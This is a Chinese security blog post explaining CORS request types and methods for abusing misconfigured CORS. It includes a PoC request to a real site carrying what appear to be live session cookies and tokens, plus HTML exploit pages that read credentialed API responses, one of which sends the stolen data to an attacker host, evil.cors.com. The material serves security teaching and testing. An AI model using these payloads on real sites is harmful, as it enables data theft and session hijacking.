zoukankan      html  css  js  c++  java
  • 应用安全

    CORS

    简介

    用途
    解决同源下资源共享问题(其他类似方案:更改document.domain属性 | 跨文档消息 | JSONP)

    分类

    (1)Simple Request

    User Request:
    function retrieveData() {
      var request = new XMLHttpRequest();
      request.open('GET', 'http://public-data.com/someData', true);
      request.onreadystatechange = handler;
      request.send();
    }

    Browser Request:
    GET /someData/ HTTP/1.1
    Host: public-data.com
     ......
    Referer: http://xxx.com/somePage.html
    Origin: http://xxx.com
    Response:
    HTTP/1.1 200 OK
    Access-Control-Allow-Origin: http://xxx.com
    Content-Type: application/xml

    (2)Preflighted Request 

    User Request:
    function sendData() {
        var request = new XMLHttpRequest(),
        payload = ......;
        request.open('POST', 'http://public-data.com/someData', true);
        request.setRequestHeader('X-CUSTOM-HEADER', 'custom_header_value');
        request.onreadystatechange = handler;
        request.send(payload);
     }
     
    Browser Request-1:
    OPTIONS /someData/ HTTP/1.1
    Host: public-data.com
     ......
    Origin: http://xxx.com
    Access-Control-Request-Method: POST
    Access-Control-Request-Headers: X-CUSTOM-HEADER

    Response-1:
    HTTP/1.1 200 OK
    Access-Control-Allow-Origin: http://xxx.com
    Access-Control-Allow-Methods: POST, GET, OPTIONS
    Access-Control-Allow-Headers: X-CUSTOM_HEADER
    Access-Control-Max-Age: 1728000
    ......
    
    
    Request-2:
    POST /someData/ HTTP/1.1
    Host: public-data.com
    X-CUSTOM-HEADER: custom_header_value
    ......
    
    
    Browser Response-2:
    HTTP/1.1 200 OK
    Access-Control-Allow-Origin: http://xxx.com
    Content-Type: application/xml
    ......

    (3)Requests with Credential

    User Request:
    function retrieveData() {
         var request = new XMLHttpRequest();
         request.open('GET', 'http://public-data.com/someData', true);
         request.withCredentials = true;
         request.onreadystatechange = handler;
         request.send();
     }

    Response:
    HTTP/1.1 200 OK
    Access-Control-Allow-Origin: http://xxx.com
    Content-Type: application/xml
    
    

    POC 

    GET /organic-traffic-insights/api/rest/1.2/users/███/projects?_=1496248656402 HTTP/1.1
    Host: www.semrush.com
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Referer: https://www.semrush.com/projects/
    X-Requested-With: XMLHttpRequest
    Cookie: wp13557="UWYYADs-TTTW:WWLHWYDtlnDl-TJIH-UYUTDDDIALHUZDLZTAHTIV-CCAY-XMLT-IUUA-UYUBWXWZACCWDlLtkNlo_Jht"; ref_code=__default__; usertype=Free-User; marketing=%7B%22user_cmp%22%3A%22%22%2C%22user_label%22%3A%22%22%7D; localization=%7B%22locale%22%3A%22en%22%2C%22db%22%3A%22sg%22%7D; db_date=current; userdata=%7B%22tz%22%3A%22GMT+8%22%2C%22ol%22%3A%22en%22%7D; _ga=GA1.2.412244322.1496213122; _gid=GA1.2.1937633003.1496213122; visit_first=1496213122000; __uvt=; uvts=65OAcWY4QhJHESTs; referer_purchase=https%3A%2F%2Fes.semrush.com%2Fdashboard%2F; sct:feedback:show=false; __insp_uid=2126149429; temp_db_but=sg; db=us; exp_feature_popup_closed=yes; about_sessionid=gue5yj2t8bmucnlwuv1y1cxilq7a7q8g; about_csrf=i6C8isOR7WLuVa1348FSsPH6rXzVEQSr; n_userid=LuWhoFku7Ou4q2PeBHIUAg==; __zlcmid=gngUE7HFajaRsy; _bizo_bzid=ec0d2554-575b-420b-b404-51b70939ec49; _bizo_cksm=34222E182676EC07; _bizo_np_stats=155%3D338%2C; auth_token=CMFMT27JhWR9cnbkoV1dHvFaxc4tQ3f0B4IAw5BfTOjyeKeF9FKx8w2kpiLl; __insp_wid=1632961932; __insp_slim=1496248714271; __insp_nv=false; __insp_targlpu=aHR0cHM6Ly93d3cuc2VtcnVzaC5jb20vcHJvamVjdHMvIzgwMDEyMi92aWV3Lw%3D%3D; __insp_targlpt=U0VNcnVzaA%3D%3D; __insp_norec_howoften=true; __insp_norec_sess=true; org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=en; connect.sid=s%253A4cV9yXJcfQFXmC65JJn3KSP6Wp184s10.vGOEA1%252BgVTXbwDY4YSOkOjjnteLNyifmcQdJh8XZckI; _gat=1; _uetsid=_uetd1ba382c; JSESSIONID=4423D9EF5D5BEE794094AC0713E9EE8E; _gat_UA-6197637-22=1
    Connection: close
    Origin: https://itqayzlbkshw.com


    response it returns Access-Control-Allow-Origin: https://itqayzlbkshw.com

    CORS + CSRF -》向被攻击主机发送文件

    CORS + XSS -》劫持用户会话 | 注入攻击

    蠕虫

     

    JSONP 

    (1)

    XSS

    1.POC | EXP

    (2)越权

    同源策略绕过方法

    (1)绕过 - 仅对域名校验

    #POC
    #"Access-Control-Allow-Origin: https://xx.co & Access-Control-Allow- 
        Credentials: true".
    #Origin: https://xx.co.evil.net, Access-Control-Allow-Origin: https://xx.co.evil.net.
    <html>
    <body>
    <button type='button' onclick='cors()'>CORS</button>
    <p id='demo'></p>
    <script>
    function cors() {
    var xhttp = new XMLHttpRequest();
    xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
    var a = this.responseText; 
    document.getElementById("demo").innerHTML = a;
    xhttp.open("POST", "http://evil.cors.com", true);
    xhttp.withCredentials = true;
    console.log(a);
    xhttp.send("data="+a);
    }
    };
    xhttp.open("GET", "https://www.xx.co/api/v1/users/*******", true);
    xhttp.withCredentials = true;
    xhttp.send();
    }
    </script>
    </body>
    </html>
    View Code

    (2)访问源未列入白名单,并且具备规则Access-Control-Allow-Credentials: true

    <html>
         <body>
             <h2>CORS PoC</h2>
             <div id="demo">
                 <button type="button" onclick="cors()">Exploit</button>
             </div>
             <script>
                 function cors() {
                 var xhr = new XMLHttpRequest();
                 xhr.onreadystatechange = function() {
                     if (this.readyState == 4 && this.status == 200) {
                     document.getElementById("demo").innerHTML = alert(this.responseText);
                     }
                 };
                  xhr.open("GET",
                           "https://api.xx.com/endpoint", true);
                 xhr.withCredentials = true;
                 xhr.send();
                 }
             </script>
         </body>
     </html>
    View Code
  • 相关阅读:
    Atitit (Sketch Filter)素描滤镜的实现  图像处理  attilax总结v2
    JS设置cookie、读取cookie、删除cookie
    Atitit 图像处理30大经典算法attilax总结
    Atitit数据库层次架构表与知识点 attilax 总结
    Atitit 游戏的通常流程 attilax 总结 基于cocos2d api
    Atitti css transition Animation differ区别
    Atitit 图像清晰度 模糊度 检测 识别 评价算法 源码实现attilax总结
    Atitit 全屏模式的cs桌面客户端软件gui h5解决方案 Kiosk模式
    Atitit 混合叠加俩张图片的处理 图像处理解决方案 javafx blend
    Atitit  rgb yuv  hsv HSL 模式和 HSV(HSB) 图像色彩空间的区别
  • 原文地址:https://www.cnblogs.com/AtesetEnginner/p/11261569.html
Copyright © 2011-2022 走看看